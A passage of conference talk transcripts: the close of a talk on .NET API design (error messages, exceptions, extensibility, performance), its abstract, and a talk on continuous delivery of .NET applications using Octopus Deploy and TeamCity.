case, we've got a Person class that has a string Name and Hobbies, which is a list of strings. But in our JSON, hobbies is just a string. It's comma delimited, but if you try and deserialize a string into a list collection, it's going to fail. And the error that people got, so this was back in JSON.NET 1.0 many years ago, this is the error that people would get if they tried to do that: expected JSON array contract, got JSON string contract. So internally within JSON.NET, I was expecting an array, but I was getting a string. But I was giving the users a very bad message. And even though I was throwing an error, which is great, the worst thing you can do is just silently fail, it wasn't helping a user. A user would see this and get confused. They would ask for help, they would have to read documentation, they would potentially just throw JSON.NET away and use something else. So this is an example of a good error message: later I improved the error message to be something more like this. So 'error converting value', and I'd show the string value, 'to type', and I'd list the type, and then I'd throw that as the error.
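The improved message amounts to something along these lines; this is a reconstruction with a hypothetical helper, not JSON.NET's actual source:

```csharp
using System;

public static class DeserializationErrors
{
    // Builds the kind of descriptive message being described: show the offending
    // value and the target type so the user can diagnose the mismatch themselves.
    public static Exception ConversionError(object value, Type targetType)
    {
        return new InvalidOperationException(
            $"Error converting value \"{value}\" to type '{targetType.FullName}'.");
    }
}

// e.g. Error converting value "Shopping, Running" to type 'System.Collections.Generic.List`1[System.String]'.
```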
It's immediately much more obvious what's going wrong. They would look at that hobbies value and potentially see, hey, that's a string. They would look at the type that they'd be deserializing to: hey, that's a list, it's not a string. That's why it's failing. And the user's able to quickly fix the mistake themselves without having to go looking for help. To go even further, in later versions of JSON.NET, I included information like the position in the JSON and the path to it. So now it's immediately obvious, even if it was a huge JSON file, exactly which bit of JSON was causing the error, and a user would be quickly able to fix the issue. And if we compare it to what they were originally getting, it's much easier for a user to understand what's going on, what went wrong, and to fix it themselves. So with errors, it's very important to fail fast. Imagine we had this report service, and it took some credentials. In this case, we're passing it null, but because we're not validating it, down here, when we then try and call GenerateReport, and we do give that a valid argument, we get a null reference error. But the actual mistake, passing in null, happened in code earlier than where we got the error, so the developer is really confused. What you want to do is fail as soon as the user does something wrong with your code. That makes it immediately obvious to them what's wrong, where it went wrong, and how they can fix it. So with exceptions, you want to subclass Exception to provide your own custom exceptions. This allows users to catch exceptions that are specific to your library and ignore exceptions from, potentially, their own code. So in this case, I've created my own JSON serialization exception. I inherit from Exception, and I've got a constructor which then passes the values to the base Exception. This will then allow users to do a try/catch where they only catch the JSON exception. Then, when you're performing operations, quite often it's useful to catch exceptions from the underlying .NET framework, wrap them in your own exception, and then re-throw that to the user. So in this case, I've got a PropertyInfo, which is used in reflection, and a value which is being set on a target. If there's an error inside that, perhaps the value doesn't match the property type, I'm catching that exception and adding some additional information to it. In this case, I'm giving the name of the property which caused the error, and then I'm re-throwing that. It's very important when you do this, when you re-throw an exception, that you wrap it. So in this case, I'm passing it to the constructor of my own exception. This preserves the stack trace; otherwise, whenever you throw a new exception, you throw away the stack trace. So in this case, the original exception will become the inner exception.
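In code, that wrap-and-rethrow pattern looks roughly like this; the exception type and class names are illustrative, not JSON.NET's:

```csharp
using System;
using System.Reflection;

public class WidgetSerializationException : Exception
{
    public WidgetSerializationException(string message, Exception innerException)
        : base(message, innerException)
    {
    }
}

public static class PropertySetter
{
    public static void SetPropertyValue(PropertyInfo property, object target, object value)
    {
        try
        {
            property.SetValue(target, value);
        }
        catch (Exception ex)
        {
            // Wrap the original exception so its stack trace survives as InnerException,
            // and add the property name to make the failure easy to diagnose.
            throw new WidgetSerializationException(
                $"Error setting value to property '{property.Name}'.", ex);
        }
    }
}
```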
So when designing for extensibility, you want to use virtual methods with care. There's two schools of thought with virtual methods. There's one which is make everything public, make everything protected, nothing's private, everything's virtual, so a user can do exactly what they want; they can override all the things, and that way your library is infinitely powerful. The problem with that is it's quite easy to break existing code with virtual methods. You already saw in that previous case how a virtual method called in a constructor can cause issues. So I'm of the opinion you want to use virtual methods with care. They're powerful, but they're dangerous, and you need to put thought into how they're used. The other thing you want to think about when designing for extensibility is to prefer composition over inheritance. Inheritance is very useful, but composition is potentially much more powerful and provides much more ability for users to customize how something works. So in the case of JSON.NET, the JsonSerializer, there are zero virtual methods on it. All the extensibility is provided through other objects that you can plug into it. So you can plug in a reference resolver, you can plug in a contract resolver, you can plug in a trace writer, you can plug in your own custom JSON converters. By doing that, you're also encouraging reusability. People can implement their own reference resolvers, contract resolvers, and JSON converters, and then they can publish those to the web, and other people can use those and plug those in within their own applications.
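A sketch of that composition style in use; the settings and resolver shown here are a couple of the stock JSON.NET components, though the surrounding class is just an example:

```csharp
using Newtonsoft.Json;
using Newtonsoft.Json.Converters;
using Newtonsoft.Json.Serialization;

public static class SerializationExample
{
    public static string Serialize(object value)
    {
        // Behaviour is customized by plugging objects into the settings,
        // not by overriding virtual methods on the serializer itself.
        var settings = new JsonSerializerSettings
        {
            ContractResolver = new CamelCasePropertyNamesContractResolver()
        };
        settings.Converters.Add(new StringEnumConverter());

        return JsonConvert.SerializeObject(value, settings);
    }
}
```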
So the final thing we'll look at is designing for performance. A lot of the key things for designing for performance have actually already been covered. Lazy constructors: you want your constructors to just do initialization and lazily defer work until it's needed. Cheap properties: properties should be fast. You don't want to use exceptions for flow control. Throwing exceptions is very slow if you're doing a lot of them. So if you've got a web request and you only throw one exception, that's fine; but if you're doing a web request and you've got a foreach loop, and within each iteration you're throwing an exception, and that loop runs a thousand times, those thousand exceptions can certainly add up. So avoid using exceptions for flow control; use exceptions just for when something actually does go wrong. Use structs when appropriate. Allocating tens of thousands of objects can be fine, but doing it within a high-throughput web application, you can create a lot of garbage collection, which can potentially slow your website right down when garbage collection does happen. You want to use async properly. I'm not going to cover how to use it properly because that's literally an hour in itself. That's the whole async/await that's been introduced in the newest version of .NET; doing it properly is very hard. I recommend, if you do have an API that has long running operations, look into how to use it properly. And I think it's very important when designing for performance to avoid harming API usability for internal performance gains. Computers tend to get faster, but your API is not going to get more usable over time. So even if it's slow today, you might figure out a way to make it faster internally in future, but once you've published an API and people are using that API, you've got no way to really take it back. So, some more information. If you're curious about API design and you want to know more, I really recommend this book. It was written by Brad Abrams, who coined that phrase, the power of sameness, and some other people at Microsoft. The most recent version of this, the Framework Design Guidelines, is a second edition; it came out in 2008. So although that was a little while ago, the vast majority of it is still applicable today, and I really recommend it. And another great resource is this YouTube video. It was put up by a guy at Google: How to Design a Good API and Why it Matters. And although at Google they're more C++ and Java and Python, and none of it is .NET specific, a lot of the high level concepts are still applicable and it's quite a good watch. So that's everything I have for you today. It looks like we're bang out of time. I'm going to hang around to answer questions. But other than that, you've been a great audience, and I hope everyone has learned something. And thank you very much. Thank you.
|
There are .NET libraries that are complex to setup, hard to understand, difficult to debug, and impossible to extend. And then there are .NET libraries for the same task that wonderfully just work. Why do some libraries succeed where others fail? In this session James will discuss what makes a well designed API, from high level design principles like The Pit of Success, The Wall of Complexity, and The Power of Sameness, to applying those concepts in low level .NET class design, with the goal of creating .NET libraries that developers love to use.
|
10.5446/50809 (DOI)
|
All right, good morning. How's everybody doing after the attendee party last night? Well, some of you made it here and that's good. So my name is Jeff French and I've been delivering software for, I don't know, about five to eight years to production systems. I've been delivering it well for about two years. And a lot of that was, you know, a learning experience. And that's what I want to kind of share with you today about my search for what the right delivery process looks like and how I found it in a couple of tools called Octopus Deploy and TeamCity. So first, a quick show of hands. How many people are practicing agile at your shop? Yeah? It's kind of bright up here. I'm not sure how many people, okay. And how many of you are practicing continuous delivery currently? Okay. About half? Good, good. Oops. Okay, next slide. Oh, okay. Here's my vanity plate, my shameless self-promotion. If you want to follow me on Twitter, check out my blog. I'll have this information at the end too. So today, here's kind of what we're going to go through. We're going to start by talking about what continuous delivery is and, you know, why it's important, some of the wrong ways that I have tried to do it over the years and how I kind of landed on the right way to do it. So this is my definition of continuous delivery, okay: delivering working, tested software to your customers as frequently as is practical. Now I say practical rather than possible because it may be possible for you to deliver working tested software every 10 minutes if you work someplace like GitHub, and they do that. It may not be practical because your end users may not actually tolerate that pace. This was something that I found in my own experience. Now here's a couple of quotes from the principles behind the agile manifesto. All you people who are practicing agile, have you read the agile manifesto? No? It was written back in 2001 when the kind of concepts of agile were first being discussed. And some of the principles they had there were, as you see on the screen, satisfy the customer through early and continuous delivery of valuable software. Deliver working software frequently, from a couple of weeks to a couple of months, all right. When the kind of founding fathers, if you will, of agile were kind of coming up with these concepts that we are all practicing today, they understood inherently that continuous delivery was going to be an integral part of practicing a good agile system, because it doesn't do you any good to develop in quick short iterations if you're not actually taking that business value you've created and delivering it to your users. It's not business value until you deliver it, right? So I told you before that you need to deliver software as frequently as is practical, all right, because you don't want to be this guy. This was me. I had a nice agile system set up at one of my companies and we were getting two-week sprints going and we were starting to really kind of get a nice pace and building a good velocity and all that. We set up a nice little continuous delivery system, it was a decent one anyway, and started delivering to production every two weeks on the nose, every Wednesday night or every other Wednesday night. I was pushing out that sprint's deliverables and feeling pretty good about myself. You're like, all right, look at me go. Good job, Jeff. You went ahead and started doing agile and you're delivering business value to your customers early and often. This is great and I bet my customers are super happy with it.
After about three months I got called into a meeting with the rest of the business stakeholders that I was delivering these applications to and they said, hey, why don't you slow down a little bit? I was like, what? It just blew my mind. I'm delivering new features too often? I've never heard this complaint before. I thought that was the whole reason we're doing agile. It turns out that the folks who were using this had a jam-packed busy day and they knew our system very, very well, even its limitations or things that they had to use workarounds for. They were so busy on a day-to-day basis that they didn't have time in their schedule every two weeks to stop and learn new features or find where things had been reorganized as we optimized our user experience. Even though it was things that were ultimately going to save them time and make them more productive, they didn't have time to learn it that frequently. They said, we'd rather go quarterly. That way, once a quarter, we know when the release is coming and we can go ahead and train on it in advance and set aside time that one time once a quarter and then have all those new features. I cried a little bit and I was sad and I moped around the office a little bit. Then it hit me. I was like, well, you know, let's try it. We started practicing it that way. We spent about a quarter doing that. What we found was that all of a sudden, we were doing this. Our business users would report a bug that's causing them a problem. We would pick that up and we'd put it in the sprint and we'd fix that bug and we'd mark it as resolved in our tracking system. The user who reported it would get a notification that said, great, your bug has been fixed. Now your life is going to be awesome. They'd say, that's great. When is that coming out? We'd say, oh, it's coming out in three months. And they'd say, you already fixed it, though. How come I still have to put up with this? That's when I figured out that what worked best for my company at the time, and this has been something that other companies have really adopted too, is pushing out bug fixes at the end of every sprint, but saving the features for a quarterly release, or whenever your business users or end users will tolerate those new features coming out. We just developed a bit of a branching strategy where we're like, okay, this branch represents what's in production right now. Here's our development branch. If you build a feature, leave it on the development branch until the end of the quarter. If you fix a bug and the bug is signed off, then just cherry pick that change set down here to our release branch and we'll push it out at the end of the sprint. That established a really nice cadence that worked well for both our development team and the end users that we were delivering software for, and it worked out really, really well. If you are at a company that, like mine was before we got a good continuous delivery system going, is practicing what I like to call Scrummerfall, where you have a scrum system on your development team that's jammed in the middle of a waterfall delivery cycle, if you're doing that, you're kind of trolling your users and you need to find a way to deliver that valuable software to them more frequently. Today, as we talk about continuous delivery, we're going to look at a system that is described on this slide.
The reason that it has complexity is because as I was looking for a good way to deliver software, I would go to conferences or watch talks online and they would show me cool stuff like, hey, here you go, check this out. Here's how you can right click and deploy from Visual Studio and it's going to automatically deploy your stuff and it's great. I'd say, yeah, that is awesome. I love it. That's great. I'd come back from the conference or from watching a talk and I'd tell the rest of the dev team, I learned the coolest thing. It's going to be awesome. We're going to be able to just right click in Visual Studio and deploy a website. It's going to be cool. Then I would go, because these guys stood on stage and they went File, New, Hello World MVC app and shipped it right out the door and it was fine. Then I went back and I opened up my copy of Visual Studio with our solution that had 69 projects in it, comprised of about eight or nine deployable web apps, three or four Windows services. We had four or five console apps that had to be run as scheduled tasks. We had services that used MSMQ for message queuing and we had to create message queues when we deployed and everything. I would go, oh, the guy on stage didn't show me how to do this with an actual complex application that has a lot of parts to it. They just showed me the new hotness of MVC and how I could right click and deploy. I found out that doing deployments of a real application is hard. You need a good set of tooling around that. So I started building it and I tried this. We would go ahead and just right click and deploy and try to build up zip files and xcopy them out to production shares and unzip them and make sure it was on all the web servers. Wow. That did not work very well at all. We had to do releases at 11 p.m. on Wednesday nights, and there was many a time that at 4 a.m. on Thursday, in a very, very exhausted state where I couldn't even think straight, I was trying to roll back a failed deployment so that whenever all my users got ready to come to work in the morning, they actually had a system to use. It was not good. The reasons being, it wasn't consistent. There was no consistency in how things got deployed. It was definitely not repeatable, so if I had to redeploy the same version, there was no way I could actually guarantee I was going to get it right. And there was no traceability. So even trying to roll back my own stuff, I had to try to remember what all I had done so I could go undo it. And that left a really bad taste in my mouth with deployments. So I did what any smart developer would do. I said, if I've got to do something more than once, I'm going to automate it, right? So I wrote some batch scripts. They're all batch files, right? That's the first line of defense in deployment. And it got better. Suddenly our deployments were a little bit more consistent. They were a little bit closer to repeatable. They were a little bit traceable. I had to occasionally write something out to a log file somewhere. And it got a little bit better. But these batch scripts got really, really unwieldy over time. There was a lot of just really stupid complex logic in them, hard-coded passwords for production accounts. It was not pretty. But it worked for a while, and we were doing it. And we were using this method when we first started delivering to production every two weeks and my users got mad at me. But I had it working.
But it left me kind of wanting more and trying to figure out there's got to be a better way to deploy software. And it made me start thinking about what things really need to be in a good deployment system. And that's where these bullet points kind of come from, is that I said, hey, it's got to be consistent. It's got to do it the same way every single time. It's got to be repeatable so that if I have a production server crash and I need to redeploy my application to it, it's got to be the same as it was before. And most of all, I needed some traceability, especially as there was more people than just me doing deployments. We needed to know who had been doing what so we could make sure that we went and shook our finger at the right person if everything was broken. And it was usually me. So maybe the traceability kind of bit me in the ass. Then I stumbled across a product that at the time was in beta called Octopus Deploy. And it kind of opened my eyes to a new way of building things. It's got the concept of build once and deploy everywhere. Build your executables, your binaries, your DLLs, whatever your deliverable package is for your website, your service, your EXE, build it once. And then deploy that same exact built thing everywhere that it needs to go. And that means to all your multiple environments. This is big, especially if you have to be, like, SOX compliant at your company. You need to be able to prove that the very binary that you tested and signed off as good is the exact same thing that you sent to production. Octopus Deploy supports that. And I was like, oh, that's brilliant, because I was running a new build for every environment, because I wanted all my web config transforms to work for each one of my environments, so I was having to run that. It's repeatable. It's automated, which is the biggest thing. I don't know if you guys know this about yourselves, but you're human, I'm pretty sure. And like me, you probably make mistakes from time to time. And so do the other engineers. Well, I'm sorry, you guys, I'm sure, don't make mistakes, but the other engineers on your team, am I right? Like those guys make mistakes. And that's why you want to automate your stuff. So you can say, hey, look, I wrote the automation script, so I know it's good. Therefore you don't have to go do this process and screw it up, which is one of those things that really saved my own butt a lot of times, because I only had to get it right once. Octopus Deploy introduces the concept of, like, an approval process for your deployments. So you can go ahead and get an authoritative approval by the right person in the company that says, yes, these things can go to production. They've been signed off. And it also created a whole lot of logging and traceability, so I had good insight into what was going on. So let's take a look at it. So over here, I've got a nice little Windows Server 2012 machine. And this beautiful little thing you see here is Octopus Deploy. Coming off the bat, you're going to see one of my favorite features of Octopus Deploy, which is this dashboard. This dashboard becomes an information radiator that you can use, and you can put this up on a screen somewhere in your ops area or your dev area or both. And all of a sudden, everybody, your dev team, your ops team, your dev ops team, if you're cool enough to have that title, can all see what version you've got deployed in what environment. Was it a successful deployment or is there a big red failure? So let's take a look at this.
As you can see here, I've got version 2.0.7.25 in development, but I'm only on .24 in staging and production. And I'm pretty sure that .25 is ready to go out to staging and be tested. So let's go push it to staging. I'm going to click in here and I'm going to say promote to staging. Okay, here's the steps it's going to run. Great. Do it. And here it goes. It's deploying. That's all I had to do. Click, click, done. It's acquired the packages that it's going to deploy. It's going through and deploying my service bus, it's deploying my website. It's going to deploy the mailer scheduled task. And there you go. Now, I just pushed the exact same bits that I said were in development, that I went out and tested in development right over here, 2.0.7.25 in our development environment at development.complexcommerce.com, and I pushed it out to staging. Here's our staging area. As you can see, we're in staging.complexcommerce.com. So let's go ahead and refresh and take a look at, ah, look at that. 2.0.7.25, pushed to staging. That was pretty simple. I didn't even open up a command shell or Visual Studio to do that. That's good stuff. So let's take a look at what this did for us. Obviously it deployed our website. Let's go have a look in here. Everybody see that okay? Oops. That's not what we want. So as you can see here, I've got this complex commerce website. Obviously, like a real production system, I'm running dev, staging and production all on one machine. It's a demo. I've got complexcommerce.development, complexcommerce.production, complexcommerce.staging. Octopus Deploy came in here and created those sites for me. They didn't exist before I did the first deployment. All right. It came in and set up my site in IIS. It created application pools that you can see here, set them to the right version of the .NET framework, 4.0 and integrated, set them to use the application pool identity, or I could tell Octopus, hey, go ahead and use this dedicated user I've set up for each environment. It did all that for me. Great. That means that now I know my websites are created in a repeatable manner. If I have to deploy this onto six or eight or 10 web servers, it's going to set those sites up for me the right way. It's going to set the right application pool identity so that if I've configured my production domain so that this particular app pool identity has access to a database or a particular file share, Octopus Deploy is going to make sure I've got all that set up and ready to go. Now, I told you we were deploying something complex, so we also had some Windows services in there, right? We had one anyway. It's a service bus that handles communication between whatever, full disclosure, this website doesn't work. But it does have these Windows services, and as you can see here, it created the complex commerce service bus for development, production and staging. Again, those didn't exist before I did the first deployment. It came in here, and every time I do a new deployment, it updates those, points them at the right version of the EXE running under the right service account. What all kind of stuff can you deploy with Octopus Deploy? Anything you can think of, just about, that gets deployed on Windows, you can do it with Octopus Deploy. It's got really great, rich support for deploying websites to IIS, deploying Windows services. It's got integrated support for deploying to Windows Azure, Windows Azure websites, Windows Azure cloud services. You can deploy over FTP or SFTP.
Basically you can deploy just about anything. You can deploy a command line file. All you've got to do is package up your application in a certain format that we'll talk about in a minute and feed it to Octopus Deploy and say, I want you to go put it on these machines. The reason I say you can deploy anything is because Octopus Deploy is based on PowerShell. Basically anything you can do with PowerShell, you can do with Octopus Deploy. You're going to go ahead and put in some of these scripts that it's going to run by convention. If it finds one of these scripts in your package, it will run it at the appropriate time. You can tell by the name pretty much what they do. We've got a pre-deploy that it's going to run before it actually starts the deployment, after it's unzipped your package. It's got the deploy.ps1 that's going to represent the actual deployment that needs to happen. A post-deploy if you need to do any cleanup or run any integration tests or warm up your site. Deploy failed in case something goes wrong during the deployment; you can have a hook in there to actually go and log it somewhere, gather some debug info, roll something back. There's a lot of good options there. Let's have another demo. I told you that Octopus Deploy supports the concept of build once and run everywhere. Let's look at what we're doing for our builds. In this system, I'm using TeamCity. I used to use Team Foundation Server, but I'm recovering. I'm using TeamCity now. To be fair, I haven't used Team Foundation Server since about TFS 2010. I hope it's gotten better, maybe, but I abandoned it for TeamCity and I haven't looked back since. TeamCity is super easy to configure and it has a ton of features. It can also run on multiple platforms and it can build for multiple platforms as well, which is a lot harder to do with Team Foundation Server from what I recall. As you can see, I've got myself this build project here. Every time that I check in some code, it runs this build. It's looking at my Git repository and every time it sees a commit, it says, all right, cool, I'm going to build that for you and run all your build steps. Let's go look at what the build steps look like. We've got some general metadata about the build here, a build version here. I'm having it create a nice semantic versioning thing for me. Obviously, I've done a really nice thing of locking this into 2.0.7 and then just using TeamCity's build counter. You can really customize this based on a lot of things. You can even share build counters and build numbers between multiple build configurations. There's a lot of powerful stuff here. Looking at our build steps, you can see TeamCity's got nice support for doing NuGet package restore, right, because you don't want to check all those things into your Git repository. Just check in your package file, sorry, not NPM, your packages.config, and then have this guy go ahead and run your NuGet install and put all your NuGet packages back in for you. Keep your repository size nice and down. It's got a built-in solution runner that says, okay, cool, I'm going to just run this build for a Visual Studio solution. You point it at the solution file, tell it what targets you want it to build, and it goes off and builds it for you. Yay. It just shells out to MSBuild for that. Right here, I've got a NuGet publish step. I told you before that you needed to package your application a certain way for Octopus Deploy to use it.
Well, that certain way is a NuGet package, which sounds a little weird. You're like, wait a second, that's for packaging up libraries and tools, not my application. To be honest, it uses the NuGet package as a glorified zip file. Essentially it's a zip file that contains metadata, the most important of which being a version number. That's what Octopus Deploy is really after out of the thing. Because that provides a nice format that .NET developers are already accustomed to working with, it makes a great packaging format that can also support versioning. Let's take a look at my solution over here. We're going to see that up here at the top of my complex commerce solution, I've got this little thing called .octopack that looks a lot like the way NuGet embeds itself in your solution to support package restore. It even has its own copy of NuGet.exe. It's got a .targets file here that essentially provides a set of MSBuild targets that allows it to hook into your native build process and create this NuGet package for you. You don't have to worry about how to do it. It has automatic support for both websites and then binary type things such as executables or Windows services. It will detect your project type and handle it accordingly. All you really have to do is set an MSBuild variable: as you can see here, it injects itself into the build with a depends-on OctoPack target and it's got this run OctoPack condition. You probably don't want to build the NuGet package on your local machine every time you run your app from Visual Studio, and this is going to allow you to not have to worry about that. You can just set this on your continuous integration server and have them built out there. This is what we have done with our TeamCity solution. Let me switch back over to TeamCity. Octopus Deploy provides a TeamCity plugin that makes working with, or integrating TeamCity with, Octopus Deploy much, much simpler. After installing the Octopus Deploy plugin for TeamCity, if I come down here and look at my Visual Studio build step, there is some Octopus packaging down here. I just check a box that says run OctoPack. I say, okay, just use the build number for this build that we're already generating in order to create the package versions that we want. Now whenever my builds run, it automatically creates those packages, which I can then publish using this NuGet publish step. It's interesting here. You'll notice that the target is localhost. That's actually pointing at my Octopus Deploy server. Octopus Deploy has a built-in NuGet package feed that works pretty well and is very fast. You don't have to use it. You can use an external feed if you already have your own MyGet setup maybe, or you're running a local one. Be wary of using a file system-based NuGet feed; for whatever reason, they're insanely slow. Hopefully improvement has been made on that, but I don't think so. Octopus Deploy's internal implementation is really, really fast. It's got some optimizations to handle it a little bit better. I tell it, cool, go pick up the .nupkg file out of these directories that I built and publish it out to my Octopus Deploy server, so that Octopus Deploy has packages to send out. Now, we're going to go ahead and take this one step further, because right now I'm running a build on every single check-in, but then I have to come over here to Octopus Deploy and say, okay, yeah, that's great.
I've got my build going here, but now I've got to go create a new release and select the package versions that I want to deploy. Well, I probably want to deploy the latest version that I just built, and I can add some release notes and say, okay, cool, let's create this version. Well, I don't want to have to do that every time. I want to continuously deliver. I want this to happen automatically, especially to my dev environment where we're trying to dogfood this thing and make sure that it's working well. Let's go add a step to our build process here. I'm going to say, let's add a new build step. This is going to be based on the Octopus Deploy plug-in, a create release step. You can see I've already got my URL there, my API keys are already in. Thanks for remembering that for me, Chrome. By the way, Chrome knows way too much about me. It's a little bit scary. I'm going to tell it the project that I want it to create a release for. I'm going to say, for the release number, let's go ahead and use this built-in TeamCity variable for the build number. I want you to deploy it to my development environment. I want you to wait for the deployment to complete, because if the deployment fails, I want my build to fail. I want everything to go red across the board on my build server, on my deployment server. I want to know that something's wrong. I can pass in additional command line parameters. Save. Excellent. Let's go make a change. Now notice up here in our title bar, you can see that I've got the environment that these things are deployed to in the title of the site. It would be a lot easier to read that if those two things were switched around. Let's take a look at how that environment is getting put in there and make that change. You'll see here, if I come open up this ComplexCommerce.Web in my home view, this is a Nancy app. I am simply saying, great, I'm sorry, it's in the actual shared template. I am saying, great, on our title, set it to complex commerce, ViewBag.Environment. Awesome. As you can imagine, we are pulling that from System.Configuration.ConfigurationManager.AppSettings, the Environment setting. Great. It's in our web config. Cool. In the web config, I've got this thing set to local. How is it getting set to the rest of those things? Octopus Deploy has the concept of variables and it will go through and perform these transforms for you. You'll notice, I only have a web.Debug.config and a web.Release.config. I don't have a web.Staging.config, a web.Production.config. I don't have any of that in there to actually transform this thing for those environments. I'm letting Octopus Deploy handle that for me. If I come in here and look at the setup of my Octopus Deploy project, in our build process, here's all the steps where I've told it how to deploy my stuff. I've also got a set of variables. You'll see right here, I created a variable called environment. It's not a very creative name, but it works. I've told Octopus to plug in a special value that Octopus Deploy creates. It has all these built-in variables like the environment name, the machine name it's deploying to, the step that it's currently deploying, the version that it's deploying, what was the last version that was deployed, all these variables that it makes available to you. You can scope those variables to different settings such as, oh, I want this variable to only apply to this particular environment or on these machines or in these roles.
Well, I've told it to put the environment name that it's deploying into my environment variable so that gets surfaced in my application. We see that in what is made right up here in our, where did our little shared config go? Layout.cshtml. Great. Let's go ahead and make this change to say, let's put the environment name first. And let's save it. And let's jump down here to our, okay, great. We've got a changed file. We'll say git add dot, git commit. Yay. New changes. And we'll commit that. And we'll come over here and take a look at our TeamCity. If we come back to our project view, we're going to see that TeamCity is watching our repository and it will go ahead and pick up that pending change or make a liar out of me. Let's see. Oh, there we go. Picked up our pending change. You can see here. And after a very short delay, it will automatically kick off the build because I've told this, hey, every time there's a change, kick off a build. So there it goes. I think it's got a 60-second delay built in. So it kicked off our build for us automatically. And now we're building 2.0.7.26. I'm sure you guys can see that here. This build is running. You click on it and see the details. And luckily, it's a pretty simple project. It doesn't take too terribly long to run the build. And it's going to start to show us what steps it's taking. You see this here. Okay, it's updating the resources. It's running our Visual Studio build. It already ran the NuGet package restore because there were no new NuGet packages, so it used the cached ones. And now it's publishing those. And hey, great, it created the Octopus Deploy release and is waiting for one deployment. Let's go check out Octopus Deploy. Let's see what's happening on our dashboard. Ah, look at that. We've got a deployment in progress. Right there on our dashboard, everybody can know. Hey, cool, we're pushing out the latest changes to 2.0.7.26. This is good stuff. Great, successful deployment. Let's go take a look. In our development environment, we hit refresh, and hey, looky there. Now we've swapped our title around. Great change. New version number has been published as well, which is also coming from an Octopus variable. So awesome. That looked pretty good. And let's go ahead and at the same time, say we want to push that to staging. Well, cool. We'll just come back like we did before. Tell it we want to promote it. To staging. Go. Do your thing. Excellent. Now we can deploy our next new version. So we'll let that do its thing, and we'll come back over here. So these variables and transformations are actually really, really powerful. It uses the same concept of the web config transform, but it applies it to any kind of file. By default, it's going to go through and look for a *.Release.config, whether that's Web.Release.config or App.Release.config, and it's going to go ahead and apply that first on every deployment. And then it's going to look for a *.<Environment>.config. So if you have a Web.Staging.config that has a bunch of settings in it, it'll go apply that when it does the deployment to staging. This is how it supports the build once, deploy everywhere model. Because now your config transformation is no longer tied to your build process. It's tied to your deployment process, which is where you want it. Because those configuration values don't need to change at build time. They need to change based on the environment the code is headed into. You can also define any custom files.
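As a concrete, hypothetical example of one of those environment transforms, a Web.Staging.config sitting next to the project only needs to carry the handful of values that differ in staging; Octopus deploy runs it through the standard XDT transform engine at deployment time. The setting name here is made up for illustration:

    <?xml version="1.0"?>
    <configuration xmlns:xdt="http://schemas.microsoft.com/XML-Document-Transform">
      <appSettings>
        <!-- Overrides the value from Web.config only when deploying to Staging. -->
        <add key="PaymentGatewayUrl" value="https://staging-payments.example.com"
             xdt:Transform="SetAttributes" xdt:Locator="Match(key)" />
      </appSettings>
    </configuration>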
You can say, hey, look, go look for this file and apply config transforms across that as well. So in addition to just applying a config transform between two files, it'll also substitute in any variables that you have defined. I showed you that variables grid. So it's going to automatically look at the connection string section of your config file and sub those in, which is great. And you can actually set some sensitivity and access level on these variables. So maybe your developers have access to your Octopus deploy portal. But your production ops team says, well, I'm not giving you the connection strings for our production database. And as a developer, I don't want the connection strings for the production database. That's more responsibility than I'm looking to take on. But they can go and input those variables in and say, great, these variables are going to be available during the deployment. But we're not going to show them to you in log files. And we're not going to let people who aren't authorized see these variables. Awesome. That's going to make your ops guys really happy. This stuff can happen automatically, and they don't have to give you the password. Great. It's going to go through and look in, as we saw, your app settings of all these things and apply your variables into there. And then it's also going to make all of those variables that you have defined in the portal available to any of those PowerShell scripts we talked about, the Deploy.ps1 and PreDeploy.ps1. So you can take action based on those variables whenever you are running your own scripts. OK, more demo. So this is all fine and good. We've got this creating our build and deploying to dev every time. Great. Now we can test. Well, let's say that we decide what we want to do is we want to push out, oh, Lord, I broke it. Well, that's not good. Let's see what we did here. Probably killed the service. Let's see. We'll find our TeamCity server. We'll start that service back up. Not sure what happened there. Let's go see. OK, TeamCity is warming back up. So let's say that we want to make sure that every night we want to produce a nightly build for people to go test and use and publish that somewhere. I don't want to have to go do it every night. I want it to be automated. That's why I automate the things. Well, I can set up in TeamCity a build step that's called nightly that's set on a schedule to run every night at, I don't know, 8 p.m. or something and grab the latest change out of Dev and promote it to our staging environment. And if TeamCity ever warms itself up, I will show you that. You know, we're running short on time, so that's not that interesting of a demo anyway. Let's move on to something cooler. One of the cool things that you can do with this whole promote concept is you can also have it run smoke or integration tests before it promotes to the next environment, right? So if I set up this nightly build, let's say I've written a bunch of Selenium tests to go out and test my website or I've written a bunch of NUnit tests that are going to run integration test calls against my API. I can script that out to run in TeamCity and go ahead and say, all right, well, cool, run these, and if those pass, then promote that build from Dev to nightly, right? But if they fail, then don't do it and notify me about it. Now one of the other things I mentioned that's really important in Octopus deploy is that it creates an audit trail. Let's have a look at what our audit trail looks like.
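Before we do, here's a rough sketch of what that gated nightly promotion could look like if you scripted it yourself instead of clicking it together in TeamCity. The octo.exe command and flag names are approximate, and the paths, server URL and API key are placeholders, so treat it as an outline rather than something to paste in:

    # Run the integration / smoke tests first; only promote if they all pass.
    & .\tools\nunit-console.exe .\tests\ComplexCommerce.IntegrationTests.dll
    if ($LASTEXITCODE -ne 0) {
        throw "Integration tests failed - not promoting the Dev release"
    }

    # Promote whatever is currently deployed in Dev on to Staging.
    & .\tools\octo.exe promote-release `
        --project "Complex Commerce" `
        --from Dev --to Staging `
        --server http://localhost --apiKey API-XXXXXXXXXXXXXXXX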
First off, you can see right here from the deployment that we've got nice logging. Let's look at our task log. We can see all the steps that were taken. I can see that it acquired these packages and where it got them and what version it used and it's going to tell me all about how it decided to deploy these things. It's going to go through here and show me what it did in order to deploy this tentacle and how it actually ran this deployment. So tentacles are an interesting concept in Octopus deploy. Let's come look at our environments page. Here you can see where I've defined my development staging and production environments. Each machine that I deployed to is called a tentacle in Octopus. Just taking the metaphor a little further. You install a Windows service on there called the Octopus tentacle service that is listening for commands from the Octopus server. Whenever it receives a command to do a deployment, it starts following those instructions that I've defined out in my Octopus deploy process. It will come in here and deploy these applications into these particular folders that it runs. So if I come in here and look at the C Octopus folder under applications, I've got a folder for each one of the environments that exists on this tentacle. In development, you'll see each one of my applications and in there you'll see a package. You'll see a semantic versioning folder for each one of the deployments I've run and it going up for each one. This is really powerful in that, say with an IIS website, when Octopus deploy runs this deployment, it unzips it into a whole new folder and gets everything ready to go, performs all those transforms so everything is ready to launch. And then it goes to IIS and says, well, let me go ahead and just swap your home directory on this folder. So instead of pointing at 2.0.7.24, I'm now going to point it at.25. This is really valuable because now your old version is still there. If you absolutely had to roll back, you just have to go point an IIS directory back. Of course, the nice thing about Octopus deploy is that it's repeatable so I could just go back and say, you know what? Redeploy version.24 